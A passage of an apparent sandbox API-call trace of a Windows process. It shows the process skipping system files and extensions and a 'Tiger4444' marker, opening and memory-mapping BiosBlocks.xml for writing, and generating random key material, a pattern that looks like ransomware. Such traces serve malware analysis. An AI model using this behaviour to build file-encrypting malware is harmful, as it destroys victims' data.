-1 [0051.716] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="boot") returned -1 [0051.716] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="ids.txt") returned -1 [0051.716] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="NTUSER.DAT") returned -1 [0051.716] lstrcpyW (in: lpString1=0x2fae8e6, lpString2="BiosBlocks.xml" | out: lpString1="BiosBlocks.xml") returned="BiosBlocks.xml" [0051.716] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\BiosBlocks.xml", dwFileAttributes=0x0) returned 1 [0051.717] lstrlenW (lpString="BiosBlocks.xml") returned 14 [0051.717] lstrlenW (lpString="Tiger4444") returned 9 [0051.717] lstrcmpiW (lpString1="locks.xml", lpString2="Tiger4444") returned -1 [0051.717] lstrlenW (lpString=".dll") returned 4 [0051.717] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0051.717] lstrlenW (lpString=".lnk") returned 4 [0051.717] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0051.717] lstrlenW (lpString=".ini") returned 4 [0051.717] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0051.717] lstrlenW (lpString=".sys") returned 4 [0051.717] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0051.717] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\BiosBlocks.xml" (normalized: "c:\\windows10upgrade\\resources\\i386\\biosblocks.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a8 [0051.717] QueryPerformanceFrequency (in: lpFrequency=0x2fabd20 | out: lpFrequency=0x2fabd20*=100000000) returned 1 [0051.717] QueryPerformanceCounter (in: lpPerformanceCount=0x2fabd28 | out: lpPerformanceCount=0x2fabd28*=14317058957) returned 1 [0051.718] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x2fabd80 | out: lpFileSize=0x2fabd80*=91648) returned 1 [0051.718] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0051.718] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d08 [0051.718] CreateFileMappingW (hFile=0x2a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16900, lpName=0x0) returned 0x2b8 [0051.719] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16900) returned 0xc30000 [0051.754] CryptAcquireContextW (in: phProv=0x2fab938, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2fab938*=0xc71d90) returned 1 [0051.755] CryptGenRandom (in: hProv=0xc71d90, dwLen=0x80, pbBuffer=0x2fab954 | out: pbBuffer=0x2fab954) returned 1 [0051.755] CryptReleaseContext (hProv=0xc71d90, dwFlags=0x0) returned 1 [0052.620] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0052.620] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0052.620] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0052.620] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0052.620] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.620] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x4) returned 0xc75268 [0052.620] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x204) returned 0xc89de8 [0052.620] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0052.620] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x204) returned 0xc86fb8 [0052.620] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc7d350 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x20c) returned 0xc871c8 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73cc0 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0052.621] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d350 | out: hHeap=0xc50000) returned 1 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x204) returned 0xc8f2e8 [0052.621] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75308 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73cd8 [0052.621] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0052.621] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75308 | out: hHeap=0xc50000) returned 1 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752c8 [0052.621] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752c8 | out: hHeap=0xc50000) returned 1 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0052.621] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x108) returned 0xc75fe0 [0052.621] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73cd8 | out: hHeap=0xc50000) returned 1 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x204) returned 0xc8f4f8 [0052.621] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75348 [0052.621] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75348 | out: hHeap=0xc50000) returned 1 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0052.621] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0052.621] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0052.621] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0052.621] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0052.621] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0052.621] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0052.621] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75378 [0052.621] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75378 | out: hHeap=0xc50000) returned 1 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75388 [0052.621] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75388 | out: hHeap=0xc50000) returned 1 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0052.621] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0052.621] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75328 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75328 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75378 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75378 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752a8 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752a8 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75318 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75318 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753f8 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753f8 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75338 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75338 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752a8 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752a8 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0052.622] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752c8 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752c8 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753f8 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753f8 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753d8 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753d8 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75338 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75338 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75338 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75338 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753b8 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753b8 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75398 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75398 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75398 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75398 | out: hHeap=0xc50000) returned 1 [0052.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0052.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752b8 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752b8 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75328 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75328 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753f8 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753f8 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752d8 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752d8 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75398 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75398 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753d8 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753d8 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0052.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0052.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75318 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75318 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75308 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75308 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75328 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75328 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752c8 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752c8 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75308 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75308 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752b8 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752b8 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0052.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0052.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0052.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0052.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753b8 [0052.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753b8 | out: hHeap=0xc50000) returned 1 [0052.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0052.627] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0052.627] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75348 [0052.627] HeapFree (in: hHeap=0xc50000, 